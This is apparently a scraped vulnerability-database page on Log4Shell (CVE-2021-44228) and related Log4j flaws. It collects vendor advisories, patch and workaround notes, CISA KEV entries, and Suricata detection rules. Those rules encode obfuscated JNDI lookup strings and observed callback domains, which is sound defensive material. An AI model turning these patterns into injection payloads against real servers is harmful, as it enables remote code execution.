Critical Vulnerabilities in Apache Log4j Java Logging Library On December 9, 2021, the following critical vulnerability in the Apache Log4j Java logging library affecting all Log4j2 versions earlier than 2.15.0 was disclosed: CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints On December 14, 2021, the following critical vulnerability, which affects certain Apache Log4j use cases in versions 2.15.0 and earlier, was disclosed: CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack On December 18, 2021, a vulnerability in the Apache Log4j component affe
Apache
Apache hadoop: CVE-2021-44228
vendor_apache
CVE-2021-44228 Apache hadoop: CVE-2021-44228
Apache hadoop: CVE-2021-44228
It is understood that the log4shell vulnerability CVE-2021-44228 impacts log4j2. Hadoop, as of 3.3.x depends on log4j 1.x, which is
Apache
Apache hadoop: CVE-2021-4104
vendor_apache·CVSS 7.5
CVE-2021-4104 [HIGH] Apache hadoop: CVE-2021-4104
Apache hadoop: CVE-2021-4104
JMSAppender in Log4j 1.2, used by all versions of Apache Hadoop, is vulnerable to the Log4Shell attack in a similar fashion to CVE-2021-44228. However, the JMSAppender is not the default configuration shipped in Hadoop. When JMSAppender is not enabled, Hadoop is not vulnerable to the attack. To mitigate the risk, you can remove JMSAppender from the log4j-1.2.17.jar artifact yourself following the instructions in this link .
GHSA
GHSA-jr7q-cc2x-97vj: It was found that the original fix for log4j CVE-2021-44228 and CVE-2021-45046 in the OpenShift metering hive containers was incomplete, as not all Jn
ghsa_unreviewed·2022-08-25·CVSS 10.0
CVE-2021-4125 [CRITICAL] CWE-502 GHSA-jr7q-cc2x-97vj: It was found that the original fix for log4j CVE-2021-44228 and CVE-2021-45046 in the OpenShift metering hive containers was incomplete, as not all Jn
It was found that the original fix for log4j CVE-2021-44228 and CVE-2021-45046 in the OpenShift metering hive containers was incomplete, as not all JndiLookup.class files were removed. This CVE only applies to the OpenShift Metering hive container images, shipped in OpenShift 4.8, 4.7 and 4.6.
GHSA
GHSA-4vjw-ghvr-gv6w: Versions of the Amazon AWS Apache Log4j hotpatch package before log4j-cve-2021-44228-hotpatch-1
ghsa_unreviewed·2022-06-18·CVSS 10.0
CVE-2022-33915 [CRITICAL] CWE-362 GHSA-4vjw-ghvr-gv6w: Versions of the Amazon AWS Apache Log4j hotpatch package before log4j-cve-2021-44228-hotpatch-1
Versions of the Amazon AWS Apache Log4j hotpatch package before log4j-cve-2021-44228-hotpatch-1.3.5 are affected by a race condition that could lead to a local privilege escalation. This Hotpatch package is not a replacement for updating to a log4j version that mitigates CVE-2021-44228 or CVE-2021-45046; it provides a temporary mitigation to CVE-2021-44228 by hotpatching the local Java virtual machines. To do so, it iterates through all running Java processes, performs several checks, and executes the Java virtual machine with the same permissions and capabilities as the running process to load the hotpatch. A local user could cause the hotpatch script to execute a binary with elevated privileges by running a custom java process that performs exec() of an SUID binary after the hotpatch has
GHSA
GHSA-x6m6-c6mx-qvf8: Incomplete fix for CVE-2021-3100
ghsa_unreviewed·2022-04-21·CVSS 8.8
CVE-2022-0070 [HIGH] CWE-269 GHSA-x6m6-c6mx-qvf8: Incomplete fix for CVE-2021-3100
Incomplete fix for CVE-2021-3100. The Apache Log4j hotpatch package starting with log4j-cve-2021-44228-hotpatch-1.1-16 will now explicitly mimic the Linux capabilities and cgroups of the target Java process that the hotpatch is applied to.
GHSA
GHSA-24pr-9rc2-6xv5: The Apache Log4j hotpatch package before log4j-cve-2021-44228-hotpatch-1
ghsa_unreviewed·2022-04-21
CVE-2021-3100 [HIGH] CWE-269 GHSA-24pr-9rc2-6xv5: The Apache Log4j hotpatch package before log4j-cve-2021-44228-hotpatch-1
The Apache Log4j hotpatch package before log4j-cve-2021-44228-hotpatch-1.1-12 didn’t mimic the permissions of the JVM being patched, allowing it to escalate privileges.
GHSA
Command injection in Alluxio
ghsa·2022-02-21·CVSS 10.0
CVE-2022-23848 [CRITICAL] Command injection in Alluxio
Command injection in Alluxio
In Alluxio before 2.7.3, the logserver does not validate the input stream. NOTE: this is not the same as the CVE-2021-44228 Log4j vulnerability.
OSV
Command injection in Alluxio
osv·2022-02-21·CVSS 10.0
CVE-2022-23848 [CRITICAL] Command injection in Alluxio
Command injection in Alluxio
In Alluxio before 2.7.3, the logserver does not validate the input stream. NOTE: this is not the same as the CVE-2021-44228 Log4j vulnerability.
GHSA
Security Advisory for "Log4Shell"
ghsa·2022-01-21·CVSS 10.0
CVE-2021-44228 [CRITICAL] CWE-20 Security Advisory for "Log4Shell"
Security Advisory for "Log4Shell"
### Impact
A highly critical 0-day exploit (CVE-2021-44228) is found in Apache log4j 2 library on December 9, 2021.
This affects Apache log4j versions from 2.0-beta9 to 2.14.1 (inclusive).
This vulnerability allows a remote attacker to execute code on the server if the system logs an attacker-controlled string value with the attacker's JNDI LDAP server lookup.
Another vulnerability related to the same library, which was discovered on 12/14/2021 (CVE-2021-45046) and revealed another Remote Code Execution vulnerability, has been investigated by Hazelcast team as well and it is found that it does not affect Hazelcast Products under default configurations.
The finding of CVE-2021-45105 on 12/14/2021, which can cause a Denial of Service attack, was investi
OSV
Security Advisory for "Log4Shell"
osv·2022-01-21·CVSS 10.0
CVE-2021-44228 [CRITICAL] Security Advisory for "Log4Shell"
Security Advisory for "Log4Shell"
### Impact
A highly critical 0-day exploit (CVE-2021-44228) is found in Apache log4j 2 library on December 9, 2021.
This affects Apache log4j versions from 2.0-beta9 to 2.14.1 (inclusive).
This vulnerability allows a remote attacker to execute code on the server if the system logs an attacker-controlled string value with the attacker's JNDI LDAP server lookup.
Another vulnerability related to the same library, which was discovered on 12/14/2021 (CVE-2021-45046) and revealed another Remote Code Execution vulnerability, has been investigated by Hazelcast team as well and it is found that it does not affect Hazelcast Products under default configurations.
The finding of CVE-2021-45105 on 12/14/2021, which can cause a Denial of Service attack, was investi
GHSA
GHSA-rw79-f757-2ffc: An injection vulnerability exists in a third-party library used in UniFi Network Version 6
ghsa_unreviewed·2022-01-15·CVSS 10.0
CVE-2021-44530 [CRITICAL] CWE-74 GHSA-rw79-f757-2ffc: An injection vulnerability exists in a third-party library used in UniFi Network Version 6
An injection vulnerability exists in a third-party library used in UniFi Network Version 6.5.53 and earlier (Log4J CVE-2021-44228) allows a malicious actor to control the application.
GHSA
Remote code injection, Improper Input Validation and Uncontrolled Recursion in Log4j library
ghsa·2022-01-06·CVSS 10.0
CVE-2021-44228 [CRITICAL] CWE-20 Remote code injection, Improper Input Validation and Uncontrolled Recursion in Log4j library
Remote code injection, Improper Input Validation and Uncontrolled Recursion in Log4j library
### Summary
The version used of Log4j, the library used for logging by PowerNukkit, is subject to a remote code execution vulnerability via the ldap JNDI parser.
It's well detailed at [CVE-2021-44228](https://github.com/advisories/GHSA-jfh8-c2jp-5v3q) and CVE-2021-45105(https://github.com/advisories/GHSA-p6xc-xr62-6r2g).
### Impact
Malicious client code could be used to send messages and cause remote code execution on the server.
### Patches
PowerNukkit `1.5.2.1` is a patch-release that only updates the Log4j version to `2.17.0` and should be used instead of `1.5.2.0`.
All versions prior to `1.5.2.1` are affected and are not patched.
### Workarounds
If you can't upgrade, you can use the `-Dlog4
OSV
Remote code injection, Improper Input Validation and Uncontrolled Recursion in Log4j library
osv·2022-01-06·CVSS 10.0
CVE-2021-44228 [CRITICAL] Remote code injection, Improper Input Validation and Uncontrolled Recursion in Log4j library
Remote code injection, Improper Input Validation and Uncontrolled Recursion in Log4j library
### Summary
The version used of Log4j, the library used for logging by PowerNukkit, is subject to a remote code execution vulnerability via the ldap JNDI parser.
It's well detailed at [CVE-2021-44228](https://github.com/advisories/GHSA-jfh8-c2jp-5v3q) and CVE-2021-45105(https://github.com/advisories/GHSA-p6xc-xr62-6r2g).
### Impact
Malicious client code could be used to send messages and cause remote code execution on the server.
### Patches
PowerNukkit `1.5.2.1` is a patch-release that only updates the Log4j version to `2.17.0` and should be used instead of `1.5.2.0`.
All versions prior to `1.5.2.1` are affected and are not patched.
### Workarounds
If you can't upgrade, you can use the `-Dlog4
GHSA
Critical vulnerability in log4j may affect generated PEAR projects
ghsa·2021-12-16·CVSS 10.0
CVE-2021-44228 [CRITICAL] Critical vulnerability in log4j may affect generated PEAR projects
Critical vulnerability in log4j may affect generated PEAR projects
### Impact
UIMA PEAR projects that have been generated with the `de.averbis.textanalysis:pear-archetype ` version `2.0.0` have a maven dependency with scope `test` to` log4j 2.8.2` and might be affected by CVE-2021-44228.
### Patches
- The issue has been resolved in `de.averbis.textanalysis:pear-archetype ` version `2.0.1`. Please make sure to use `de.averbis.textanalysis:pear-archetype ` version >= `2.0.1` for generating new PEAR projects.
- Existing maven PEAR projects can be patched by manually upgrading to `log4j` >= `2.16.0` in `pom.xml`.
### References
https://www.lunasec.io/docs/blog/log4j-zero-day/
### For more information
If you have any questions or comments about this advisory:
* Open an issue in https://gi
OSV
Critical vulnerability in log4j may affect generated PEAR projects
osv·2021-12-16·CVSS 10.0
CVE-2021-44228 [CRITICAL] Critical vulnerability in log4j may affect generated PEAR projects
Critical vulnerability in log4j may affect generated PEAR projects
### Impact
UIMA PEAR projects that have been generated with the `de.averbis.textanalysis:pear-archetype ` version `2.0.0` have a maven dependency with scope `test` to` log4j 2.8.2` and might be affected by CVE-2021-44228.
### Patches
- The issue has been resolved in `de.averbis.textanalysis:pear-archetype ` version `2.0.1`. Please make sure to use `de.averbis.textanalysis:pear-archetype ` version >= `2.0.1` for generating new PEAR projects.
- Existing maven PEAR projects can be patched by manually upgrading to `log4j` >= `2.16.0` in `pom.xml`.
### References
https://www.lunasec.io/docs/blog/log4j-zero-day/
### For more information
If you have any questions or comments about this advisory:
* Open an issue in https://gi
OSV
apache-log4j2 vulnerability
osv·2021-12-15·CVSS 10.0
CVE-2021-44228 [CRITICAL] apache-log4j2 vulnerability
apache-log4j2 vulnerability
It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was
incomplete in certain non-default configurations. An attacker could use this
vulnerability to cause a denial of service.
Please see the following link for more information:
https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/Log4Shell
OSV
CVE-2021-45046: It was found that the fix to address CVE-2021-44228 in Apache Log4j 2
osv·2021-12-14·CVSS 10.0
CVE-2021-45046 [CRITICAL] CVE-2021-45046: It was found that the fix to address CVE-2021-44228 in Apache Log4j 2
It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in an information leak and remote code execution in some environments and local code execution in all environments. Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix this issue by removing support for message lookup patterns and disabling JNDI functionality by default.
OSV
JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data
osv·2021-12-14·CVSS 10.0
CVE-2021-4104 [CRITICAL] JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data
JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data
JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.
OSV
Apache Log4j Remote Code Execution
osv·2021-12-14·CVSS 10.0
[CRITICAL] Apache Log4j Remote Code Execution
Apache Log4j Remote Code Execution
### Impact
Opencast uses an Apache Log4j2 version which, combined with older JDK versions, can be used for remote code execution attacks which have been found to be actively exploited.
Apache Log4j2 <=2.14.1 JNDI features is not sufficiently protected. An attacker who can control log messages or log message parameters can execute arbitrary code when message lookup substitution is enabled.
### Who is affected
- Opencast before 9.10 or 10.6 are affected
- Log4j version: all 2.x versions before 2.15.0 are affected
### Patches
The issue has been fixed in Opencast 9.10 and 10.6.
### Workarounds
The vulnerability can be mitigated by setting system property `log4j2.formatMsgNoLookups` to `true`.
### References
- [Opencast pull request mitigating the v
OSV
Incomplete fix for Apache Log4j vulnerability
osv·2021-12-14·CVSS 10.0
CVE-2021-45046 [CRITICAL] Incomplete fix for Apache Log4j vulnerability
Incomplete fix for Apache Log4j vulnerability
# Impact
The fix to address [CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228) in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a remote code execution (RCE) attack.
## Affected packages
Only the `org.apache.logging.log4j:log4j-core` package is directly affected by this vulnerability. The `org.apache.logging.log4j:log4j-api` should be kept at the same version as the `org.apach
GHSA
JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data
ghsa·2021-12-14·CVSS 10.0
CVE-2021-4104 [CRITICAL] CWE-502 JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data
JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data
JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.
GHSA
Apache Log4j Remote Code Execution
ghsa·2021-12-14·CVSS 10.0
[CRITICAL] Apache Log4j Remote Code Execution
Apache Log4j Remote Code Execution
### Impact
Opencast uses an Apache Log4j2 version which, combined with older JDK versions, can be used for remote code execution attacks which have been found to be actively exploited.
Apache Log4j2 <=2.14.1 JNDI features is not sufficiently protected. An attacker who can control log messages or log message parameters can execute arbitrary code when message lookup substitution is enabled.
### Who is affected
- Opencast before 9.10 or 10.6 are affected
- Log4j version: all 2.x versions before 2.15.0 are affected
### Patches
The issue has been fixed in Opencast 9.10 and 10.6.
### Workarounds
The vulnerability can be mitigated by setting system property `log4j2.formatMsgNoLookups` to `true`.
### References
- [Opencast pull request mitigating the v
OSV
CVE-2021-4104: JMSAppender in Log4j 1
osv·2021-12-14·CVSS 7.5
CVE-2021-4104 [HIGH] CVE-2021-4104: JMSAppender in Log4j 1
JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.
GHSA
Incomplete fix for Apache Log4j vulnerability
ghsa·2021-12-14·CVSS 10.0
CVE-2021-45046 [CRITICAL] CWE-502 Incomplete fix for Apache Log4j vulnerability
Incomplete fix for Apache Log4j vulnerability
# Impact
The fix to address [CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228) in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a remote code execution (RCE) attack.
## Affected packages
Only the `org.apache.logging.log4j:log4j-core` package is directly affected by this vulnerability. The `org.apache.logging.log4j:log4j-api` should be kept at the same version as the `org.apach
OSV
CVE-2021-44228: Apache Log4j2 2
osv·2021-12-10·CVSS 10.0
CVE-2021-44228 [CRITICAL] CVE-2021-44228: Apache Log4j2 2
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
OSV
Remote code injection in Log4j
osv·2021-12-10
CVE-2021-44228 [CRITICAL] Remote code injection in Log4j
Remote code injection in Log4j
# Summary
Log4j versions prior to 2.16.0 are subject to a remote code execution vulnerability via the ldap JNDI parser.
As per [Apache's Log4j security guide](https://logging.apache.org/log4j/2.x/security.html): Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.16.0, this behavior has been disabled by default.
Log4j version 2.15.0 contained an earlier fix for the vulnerability, but that patch did not disable attacker-controlled JNDI lookups in all situations. For
GHSA
Remote code injection in Log4j
ghsa·2021-12-10
CVE-2021-44228 [CRITICAL] CWE-20 Remote code injection in Log4j
Remote code injection in Log4j
# Summary
Log4j versions prior to 2.16.0 are subject to a remote code execution vulnerability via the ldap JNDI parser.
As per [Apache's Log4j security guide](https://logging.apache.org/log4j/2.x/security.html): Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.16.0, this behavior has been disabled by default.
Log4j version 2.15.0 contained an earlier fix for the vulnerability, but that patch did not disable attacker-controlled JNDI lookups in all situations. For
VulnCheck
SolarWinds Serv-U Improper Input Validation Vulnerability
vulncheck·2021·CVSS 4.3
CVE-2021-35247 [MEDIUM] CWE-20 SolarWinds Serv-U Improper Input Validation Vulnerability
SolarWinds Serv-U Improper Input Validation Vulnerability
SolarWinds Serv-U versions 15.2.5 and earlier contain an improper input validation vulnerability that allows attackers to build and send queries without sanitization.
Affected: SolarWinds Serv-U
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.microsoft.com/en-us/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.mandiant.com/resources/blog/zero-days-exploited-2022
Remediation Due: 2022-02-04
VulnCheck
Atlassian Confluence Server and Data Center Object-Graph Navigation Language (OGNL) Injection Vulnerability
vulncheck·2021·CVSS 9.8
CVE-2021-26084 [CRITICAL] CWE-917 Atlassian Confluence Server and Data Center Object-Graph Navigation Language (OGNL) Injection Vulnerability
Atlassian Confluence Server and Data Center Object-Graph Navigation Language (OGNL) Injection Vulnerability
Atlassian Confluence Server and Data Server contain an Object-Graph Navigation Language (OGNL) injection vulnerability that may allow an unauthenticated attacker to execute code.
Affected: Atlassian Confluence Server and Data Center
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.lacework.com/blog/muhstik-takes-aim-at-confluence-cve-2021-26084/; https://cybersecurityworks.com/blog/vulnerabilities/cve-2021-26084-patch-the-confluence-servers-now.html; https://news.sophos.com/en-us/2021/10/04/atom-silo-ransomware-actors-use-confluence-exploit-dll-side-load-for-stealthy-attack/; https://www.lacework.co
VulnCheck
Microsoft Exchange Server Remote Code Execution Vulnerability
vulncheck·2021·CVSS 9.1
CVE-2021-34473 [CRITICAL] CWE-918 Microsoft Exchange Server Remote Code Execution Vulnerability
Microsoft Exchange Server Remote Code Execution Vulnerability
Microsoft Exchange Server contains an unspecified vulnerability that allows for remote code execution.
Affected: Microsoft Exchange Server
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.cybereason.com/blog/threat-alert-microsoft-exchange-proxyshell-exploits-and-lockfile-ransomware; https://www.fireeye.com/blog/threat-research/2021/09/proxyshell-exploiting-microsoft-exchange-servers.html; https://www.securin.io/microsoft-exchange-proxyshell-and-windows-petitpotam-vulnerabilities-chained-in-new-attack/; https://threatpost.com/apt-chamelgang-targets-russian-energy-aviation/175272/; https://news.sophos.com/en-us/2021/10/04/atom-silo-ransomware-ac
VulnCheck
Apache Log4j2 Remote Code Execution Vulnerability
vulncheck·2021·CVSS 10.0
CVE-2021-44228 [CRITICAL] CWE-20 Apache Log4j2 Remote Code Execution Vulnerability
Apache Log4j2 Remote Code Execution Vulnerability
Apache Log4j2 contains a vulnerability where JNDI features do not protect against attacker-controlled JNDI-related endpoints, allowing for remote code execution.
Affected: Apache Log4j2
Required Action: For all affected software assets for which updates exist, the only acceptable remediation actions are: 1) Apply updates; OR 2) remove affected assets from agency networks. Temporary mitigations using one of the measures provided at https://www.cisa.gov/uscert/ed-22-02-apache-log4j-recommended-mitigation-measures are only acceptable until updates are available.
Known Ransomware Campaign Use: Known
Exploitation References: https://cisa.gov/news-events/cybersecurity-advisories/aa21-336a; https://api.vulncheck.com/v3/index/sans-dshield?cve=
VulnCheck
Apache log4j Deserialization of Untrusted Data
vulncheck·2021·CVSS 7.5
CVE-2021-4104 [HIGH] Apache log4j Deserialization of Untrusted Data
Apache log4j Deserialization of Untrusted Data
JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.
Affected: Apache log4j
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the produ
VulnCheck
Apache Log4j2 Deserialization of Untrusted Data Vulnerability
vulncheck·2021·CVSS 10.0
CVE-2021-45046 [CRITICAL] CWE-917 Apache Log4j2 Deserialization of Untrusted Data Vulnerability
Apache Log4j2 Deserialization of Untrusted Data Vulnerability
Apache Log4j2 contains a deserialization of untrusted data vulnerability due to the incomplete fix of CVE-2021-44228, where the Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations.
Affected: Apache Log4j2
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://cisa.gov/news-events/cybersecurity-advisories/aa21-336a; https://cisa.gov/news-events/alerts/2021/12/22/mitigating-log4shell-and-other-log4j-related-vulnerabilities; https://www.fortinet.com/blog/threat-research/enemybot-a-look-into-keksecs-latest-ddos-botnet; https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in
Suricata
ET EXPLOIT Apache log4j RCE Attempt (http) (Outbound) (CVE-2021-44228)
suricata·2023-04-21·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt (http) (Outbound) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt (http) (Outbound) (CVE-2021-44228)
Rule: alert http $HOME_NET any -> any any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http) (Outbound) (CVE-2021-44228)"; flow:established,to_server; http.uri; content:"|2f 24 7b 24 7b|"; startswith; fast_pattern; content:"|3a 2d|j|7d 24 7b|"; content:"|3a 2d|n|7d 24 7b|"; content:"|3a 2d|d|7d 24 7b|"; content:"|3a 2d|i|7d 24 7b|"; content:"|3a 2d 3a 7d 24 7b|"; reference:url,lunasec.io/docs/blog/log4j-zero-day; reference:cve,2021-44228; classtype:attempted-admin; sid:2045125; rev:1; metadata:attack_target Server, created_at 2023_04_21, cve CVE_2021_44228, deployment Perimeter, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2023_04_21;)
Suricata
ET EXPLOIT Apache log4j RCE Attempt (http) (Inbound) (CVE-2021-44228)
suricata·2023-04-21·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt (http) (Inbound) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt (http) (Inbound) (CVE-2021-44228)
Rule: alert http any any -> $HOME_NET any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http) (Inbound) (CVE-2021-44228)"; flow:established,to_server; http.uri; content:"|2f 24 7b 24 7b|"; startswith; fast_pattern; content:"|3a 2d|j|7d 24 7b|"; content:"|3a 2d|n|7d 24 7b|"; content:"|3a 2d|d|7d 24 7b|"; content:"|3a 2d|i|7d 24 7b|"; content:"|3a 2d 3a 7d 24 7b|"; reference:url,lunasec.io/docs/blog/log4j-zero-day; reference:cve,2021-44228; classtype:attempted-admin; sid:2045126; rev:1; metadata:attack_target Server, created_at 2023_04_21, cve CVE_2021_44228, deployment Perimeter, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2023_04_21;)
Suricata
ET EXPLOIT Possible Apache log4j RCE Attempt - HTTP URI Obfuscation (CVE-2021-44228) (Outbound)
suricata·2022-06-21·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Possible Apache log4j RCE Attempt - HTTP URI Obfuscation (CVE-2021-44228) (Outbound)
ET EXPLOIT Possible Apache log4j RCE Attempt - HTTP URI Obfuscation (CVE-2021-44228) (Outbound)
Rule: alert http $HOME_NET any -> any any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt - HTTP URI Obfuscation (CVE-2021-44228) (Outbound)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"|28 27 24 7b 24 7b|env|3a|"; depth:25; fast_pattern; content:"|3a 2d|j|7d|ndi|24 7b|env|3a|"; distance:0; content:"|2f|TomcatBypass|2f|Command|2f|Base64|2f|"; distance:0; reference:url,isc.sans.edu/diary/rss/28246; reference:cve,2021-44228; classtype:attempted-admin; sid:2037047; rev:1; metadata:affected_product HTTP_Server, attack_target Server, created_at 2022_06_21, cve CVE_2021_44228, deployment Perimeter, confidence Medium, signature_severity Major, tag CISA_KEV, tag Descr
Suricata
ET EXPLOIT Possible Apache log4j RCE Attempt - HTTP URI Obfuscation (CVE-2021-44228) (Inbound)
suricata·2022-06-21·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Possible Apache log4j RCE Attempt - HTTP URI Obfuscation (CVE-2021-44228) (Inbound)
ET EXPLOIT Possible Apache log4j RCE Attempt - HTTP URI Obfuscation (CVE-2021-44228) (Inbound)
Rule: alert http $EXTERNAL_NET any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt - HTTP URI Obfuscation (CVE-2021-44228) (Inbound)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"|28 27 24 7b 24 7b|env|3a|"; depth:30; fast_pattern; content:"|3a 2d|j|7d|ndi|24 7b|env|3a|"; distance:0; content:"|2f|TomcatBypass|2f|Command|2f|Base64|2f|"; distance:0; reference:url,isc.sans.edu/diary/rss/28246; reference:cve,2021-44228; classtype:attempted-admin; sid:2037046; rev:1; metadata:affected_product HTTP_Server, attack_target Server, created_at 2022_06_21, cve CVE_2021_44228, deployment Perimeter, confidence Medium, signature_severity Major,
Suricata
ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (pwn .af)
suricata·2021-12-21·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (pwn .af)
ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (pwn .af)
Rule: alert dns $HOME_NET any -> any any (msg:"ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Callback Domain (pwn .af)"; dns.query; dotprefix; content:".pwn.af"; nocase; endswith; reference:cve,2021-44228; classtype:domain-c2; sid:2034824; rev:1; metadata:attack_target Client_and_Server, created_at 2021_12_21, cve CVE_2021_44228, deployment Perimeter, performance_impact Low, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_12_21;)
Suricata
ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Security Scanner Domain (kryptoslogic-cve-2021-44228 .com)
suricata·2021-12-21·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Security Scanner Domain (kryptoslogic-cve-2021-44228 .com)
ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Security Scanner Domain (kryptoslogic-cve-2021-44228 .com)
Rule: alert dns $HOME_NET any -> any any (msg:"ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Security Scanner Domain (kryptoslogic-cve-2021-44228 .com)"; dns.query; dotprefix; content:".kryptoslogic-cve-2021-44228.com"; nocase; endswith; reference:cve,2021-44228; classtype:domain-c2; sid:2034821; rev:1; metadata:attack_target Client_and_Server, created_at 2021_12_21, cve CVE_2021_44228, deployment Perimeter, performance_impact Low, confidence High, signature_severity Informational, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_12_21;)
Suricata
ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Security Scanner Domain (log4shell .huntress .com)
suricata·2021-12-21·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Security Scanner Domain (log4shell .huntress .com)
